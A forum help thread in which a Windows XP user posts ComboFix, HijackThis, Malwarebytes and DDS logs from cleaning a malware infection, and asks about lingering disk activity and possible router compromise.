Completion time: 2009-09-15 0:06
ComboFix-quarantined-files.txt 2009-09-15 23:05

Pre-Run: 2,581,270,528 bytes free
Post-Run: 3,031,089,152 bytes free

WindowsXP-KB310994-SP2-Home-BootDisk-ENU.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home Edition" /fastdetect /NoExecute=OptIn

139

New HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 00:54:38, on 16/09/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\System32\hkcmd.exe
C:\WINDOWS\System32\00THotkey.exe
C:\WINDOWS\LTSMMSG.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
C:\Program Files\TOSHIBA\PadTouch\PadExe.exe
C:\WINDOWS\system32\TFNF5.exe
C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\Program Files\NoAds\NoAds.exe
C:\Program Files\HACE\Mmm\Mmm.exe
C:\Program Files\Windows Media Player\WMPNSCFG.exe
C:\WINDOWS\system32\TPSBattM.exe
C:\Program Files\Logitech\SetPoint\SetPoint.exe
C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\Program Files\GetRight\GetRight.exe
C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE
C:\Program Files\internet explorer\iexplore.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.live.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (file missing)
O2 - BHO: IE to GetRight Helper - {31FF080D-12A3-439A-A2EF-4BA95A3148E8} - C:\Program Files\GetRight\xx2gr.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll (file missing)
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll (file missing)
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll (file missing)
O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\System32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [00THotkey] C:\WINDOWS\System32\00THotkey.exe
O4 - HKLM\..\Run: [000StTHK] 000StTHK.exe
O4 - HKLM\..\Run: [LTSMMSG] LTSMMSG.exe
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [TouchED] C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
O4 - HKLM\..\Run: [PadTouch] "C:\Program Files\TOSHIBA\PadTouch\PadExe.exe
O4 - HKLM\..\Run: [TFNF5] TFNF5.exe
O4 - HKLM\..\Run: [TPSMain] TPSMain.exe
O4 - HKLM\..\Run: [TFncKy] TFncKy.exe
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe
O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKCU\..\Run: [NoAds] "C:\Program Files\NoAds\NoAds.exe"
O4 - HKCU\..\Run: [Mmm] "C:\Program Files\HACE\Mmm\Mmm.exe"
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ?
O4 - Global Startup: Start GetRight.lnk = C:\Program Files\GetRight\GetRight.exe
O8 - Extra context menu item: Download with GetRight - C:\Program Files\GetRight\GRdownload.htm
O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files\GetRight\GRbrowse.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O14 - IERESET.INF: START_PAGE_URL=file:///C:\Program Files\TOSHIBA\Free Update Service\splash.html
O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} (Trend Micro ActiveX Scan Agent 6.6) - http://housecall65.trendmicro.com/housecal...ivex/hcImpl.cab
O16 - DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - http://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1238014490265
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} (Java Runtime Environment 1.6.0) - http://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jd...ows-i586-jc.cab
O16 - DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} (HPSDDX Class) - http://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab
O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://crucial.com/controls/cpcScanner.cab
O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx
O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll
O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll
O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
O23 - Service: C-DillaSrv - C-Dilla Ltd - C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE
O23 - Service: ConfigFree Service (CFSvcs) - TOSHIBA CORPORATION - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
O23 - Service: Google Updater Service (gusvc) - Unknown owner - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe (file missing)
O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe

--
End of file - 8375 bytes

I got an error when using HJT that I hadn't seen before. It didn't explain what it was but the scan seemed to go okay. I ran it again just to see if it would do it again but it was okay the second time round.

I have seen a new folder appear in C:\ called Qoobox. I am guessing that is all to do with ComboFix. I don't know what ComboFix did but, viewing the log, it looked as if it deleted some programs, such as GetRight, and two Toshiba uninstallation files. GetRight was no longer running in the System Tray. I rebooted the PC before posting this and the apps I thought it deleted are running again. I may have misinterpreted the log file and they were only shut down temporarily. The Toshiba files were classed as orphans(?).

Because I have got zero understanding of ComboFix and because I saw another log file in Qoobox called "ComboFix-quarantined-files.txt", I thought I would copy and paste that here too:

2009-09-15 23:03:39 . 2009-09-15 23:03:39 680 ----a-w- C:\Qoobox\Quarantine\Registry_backups\AddRemove-TouchED.reg.dat
2009-09-15 23:03:39 . 2009-09-15 23:03:39 782 ----a-w- C:\Qoobox\Quarantine\Registry_backups\AddRemove-Power Saver.reg.dat
2009-09-15 22:58:09 . 2009-09-15 22:58:09 6,869 ----a-w- C:\Qoobox\Quarantine\Registry_backups\tcpip.reg
2009-09-15 22:46:21 . 2009-09-15 22:46:21 51 ----a-w- C:\Qoobox\Quarantine\catchme.log
2009-06-02 21:35:53 . 2009-06-02 21:35:53 53,248 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\user\Application Data\Microsoft\Installer\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}\ARPPRODUCTICON.exe.vir
2002-12-11 19:39:08 . 2002-12-11 19:39:08 10,995,712 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\Installer\WMEncoder.msi.vir

Internet Explorer has gone back to certain default settings, such as warning me that I am moving to a secure server, which I assume is supposed to happen after ComboFix has done its thing.

I am still hearing that damn disk access every ten seconds so I don't know what could be doing that anymore.

Just out of curiosity, does ComboFix check for router hijacking software?

Thanks again.

Attach.zip
  20. Sorry for the delay. I ran a quick scan yesterday but wanted to do a full scan today, seeing as there was a new version of MBAM. Here is the latest MBAM log:

Malwarebytes' Anti-Malware 1.41
Database version: 2792
Windows 5.1.2600 Service Pack 3

13/09/2009 23:56:27
mbam-log-2009-09-13 (23-56-27).txt

Scan type: Full Scan (C:\|)
Objects scanned: 182979
Time elapsed: 1 hour(s), 44 minute(s), 28 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

It looks like that rootkit has finally been terminated, thanks to the new version of MBAM.
Just in case, I have posted a new HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 04:07:31, on 14/09/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\System32\hkcmd.exe
C:\WINDOWS\System32\00THotkey.exe
C:\WINDOWS\LTSMMSG.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
C:\Program Files\TOSHIBA\PadTouch\PadExe.exe
C:\WINDOWS\system32\TFNF5.exe
C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\Program Files\NoAds\NoAds.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\HACE\Mmm\Mmm.exe
C:\Program Files\Windows Media Player\WMPNSCFG.exe
C:\WINDOWS\system32\TPSBattM.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\Program Files\Logitech\SetPoint\SetPoint.exe
C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe
C:\Program Files\GetRight\GetRight.exe
C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.live.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (file missing)
O2 - BHO: IE to GetRight Helper - {31FF080D-12A3-439A-A2EF-4BA95A3148E8} - C:\Program Files\GetRight\xx2gr.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll (file missing)
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll (file missing)
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll (file missing)
O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\System32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [00THotkey] C:\WINDOWS\System32\00THotkey.exe
O4 - HKLM\..\Run: [000StTHK] 000StTHK.exe
O4 - HKLM\..\Run: [LTSMMSG] LTSMMSG.exe
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [TouchED] C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
O4 - HKLM\..\Run: [PadTouch] "C:\Program Files\TOSHIBA\PadTouch\PadExe.exe
O4 - HKLM\..\Run: [TFNF5] TFNF5.exe
O4 - HKLM\..\Run: [TPSMain] TPSMain.exe
O4 - HKLM\..\Run: [TFncKy] TFncKy.exe
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe
O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKCU\..\Run: [NoAds] "C:\Program Files\NoAds\NoAds.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Mmm] "C:\Program Files\HACE\Mmm\Mmm.exe"
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ?
O4 - Global Startup: Start GetRight.lnk = C:\Program Files\GetRight\GetRight.exe
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: Download with GetRight - C:\Program Files\GetRight\GRdownload.htm
O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files\GetRight\GRbrowse.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O14 - IERESET.INF: START_PAGE_URL=file:///C:\Program Files\TOSHIBA\Free Update Service\splash.html
O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} (Trend Micro ActiveX Scan Agent 6.6) - http://housecall65.trendmicro.com/housecal...ivex/hcImpl.cab
O16 - DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - http://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1238014490265
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} (Java Runtime Environment 1.6.0) - http://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jd...ows-i586-jc.cab
O16 - DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} (HPSDDX Class) - http://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab
O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://crucial.com/controls/cpcScanner.cab
O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx
O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll
O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll
O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
O23 - Service: C-DillaSrv - C-Dilla Ltd - C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE
O23 - Service: ConfigFree Service (CFSvcs) - TOSHIBA CORPORATION - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
O23 - Service: Google Updater Service (gusvc) - Unknown owner - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe (file missing)
O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe

--
End of file - 8503 bytes

I haven't run a new test with DDS.scr. Did you want me to do that? I never did see the optional test request come up the first time.

I have recently deleted all past System Restore points, to kill any viruses hidden away. However, while my system now appears to be clean, according to MBAM, I am still seeing (and hearing) that suspect hard drive access every ten seconds. I am still none the wiser as to what is causing it. I'm pretty sure it wasn't doing it before the infection. I don't think it is AVG 8.5 as I tried disabling it and it made no difference. Also, Process Explorer lists AVG's processes separately from what seems to be accessing the disk. Windows Task Manager doesn't show anything that gives any idea. Could there be anything nasty left in the system that is checking what I am doing? What about keyloggers, for instance?

Also, how can I tell if my router has been hacked, infected or compromised? Are there any tests I can run or are there things to look out for? I'd like to find out why the DSL light on it seems more busy than usual since my PC got infected. I'm still bothered by the post I read on this site saying that a router can have its firmware updated with a rogue version, let alone things like having the DNS changed. That sounds like something that can't be fixed, even if you reset the router to factory settings. Please could you advise me on any ways to check my router?

Thanks again.
  21. OK, I have just run DDS.scr. I didn't get any request to run an Optional Scan. I'm not sure why. I simply double-clicked on the program, a DOS box appeared and it said a three-minute test would be done. I then received the two text files. Did I need to do anything else to get the optional scan? Also, the results told me only to copy and paste DDS.txt but not to do the same with Attach.txt. Instead it told me to zip the file and attach it, which I have done. Here is DDS.txt. I temporarily disabled AVG while running DDS, which you can see listed:

DDS (Ver_09-07-30.01) - NTFSx86
Run by user at 12:16:14.93 on 10/09/2009
Internet Explorer: 7.0.5730.11
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.475 [GMT 1:00]

AV: AVG Anti-Virus Free *On-access scanning disabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\WINDOWS\System32\svchost.exe -k HTTPFilter
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\00THotkey.exe
C:\WINDOWS\LTSMMSG.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
C:\Program Files\TOSHIBA\PadTouch\PadExe.exe
C:\WINDOWS\system32\TFNF5.exe
C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe
C:\WINDOWS\system32\TPSBattM.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\Program Files\NoAds\NoAds.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\HACE\Mmm\Mmm.exe
C:\Program Files\Windows Media Player\WMPNSCFG.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\Program Files\Logitech\SetPoint\SetPoint.exe
C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe
C:\Program Files\GetRight\GetRight.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE C:\Program Files\Internet Explorer\iexplore.exe C:\Documents and Settings\user\Desktop\dds.scr ============== Pseudo HJT Report =============== uStart Page = hxxp://home.live.com/ uSearch Page = hxxp://www.google.com uSearch Bar = hxxp://www.google.com/ie uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8 uInternet Settings,ProxyOverride = <local> uSearchAssistant = hxxp://www.google.com/ie uSearchURL,(Default) = hxxp://www.google.com/search?q=%s mSearchAssistant = hxxp://www.google.com/ie BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\adobe\acrobat 7.0\activex\AcroIEHelper.dll BHO: IE to GetRight Helper: {31ff080d-12a3-439a-a2ef-4ba95a3148e8} - c:\program files\getright\xx2gr.dll BHO: AVG Safe Search: {3ca2f312-6f6e-4b53-a66e-4e65e497c8c0} - c:\program files\avg\avg8\avgssie.dll BHO: Spybot-S&D IE Protection: {53707962-6f74-2d53-2644-206d7942484f} - c:\progra~1\spybot~1\SDHelper.dll BHO: SSVHelper Class: {761497bb-d6f0-462c-b6eb-d4daf1d92d43} - c:\program files\java\jre1.6.0_07\bin\ssv.dll BHO: Google Toolbar Helper: {aa58ed58-01dd-4d91-8333-cf10577473f7} - c:\program files\google\googletoolbar2.dll BHO: Google Toolbar Notifier BHO: {af69de43-7d58-4638-b6fa-ce66b5ad205d} - c:\program files\google\googletoolbarnotifier\3.0.1225.9868\swg.dll TB: &Google: {2318c2b1-4965-11d4-9b18-009027a5cd4f} - c:\program files\google\googletoolbar2.dll TB: Yahoo! 
Toolbar: {ef99bd32-c1fb-11d2-892f-0090271d4f88} -
EB: {4528BBE0-4E08-11D5-AD55-00010333D0AD} - No File
EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File
uRun: [NoAds] "c:\program files\noads\NoAds.exe"
uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
uRun: [Mmm] "c:\program files\hace\mmm\Mmm.exe"
uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe
mRun: [igfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
mRun: [00THotkey] c:\windows\system32\00THotkey.exe
mRun: [000StTHK] 000StTHK.exe
mRun: [LTSMMSG] LTSMMSG.exe
mRun: [Apoint] c:\program files\apoint2k\Apoint.exe
mRun: [TouchED] c:\program files\toshiba\touched\TouchED.Exe
mRun: [PadTouch] "c:\program files\toshiba\padtouch\PadExe.exe
mRun: [TFNF5] TFNF5.exe
mRun: [TPSMain] TPSMain.exe
mRun: [TFncKy] TFncKy.exe
mRun: [NeroCheck] c:\windows\system32\NeroCheck.exe
mRun: [AVG8_TRAY] c:\progra~1\avg\avg8\avgtray.exe
mRun: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE
mRunOnce: [Malwarebytes Anti-Malware (reboot)] "c:\program files\malwarebytes' anti-malware\mbam.exe" /runcleanupscript
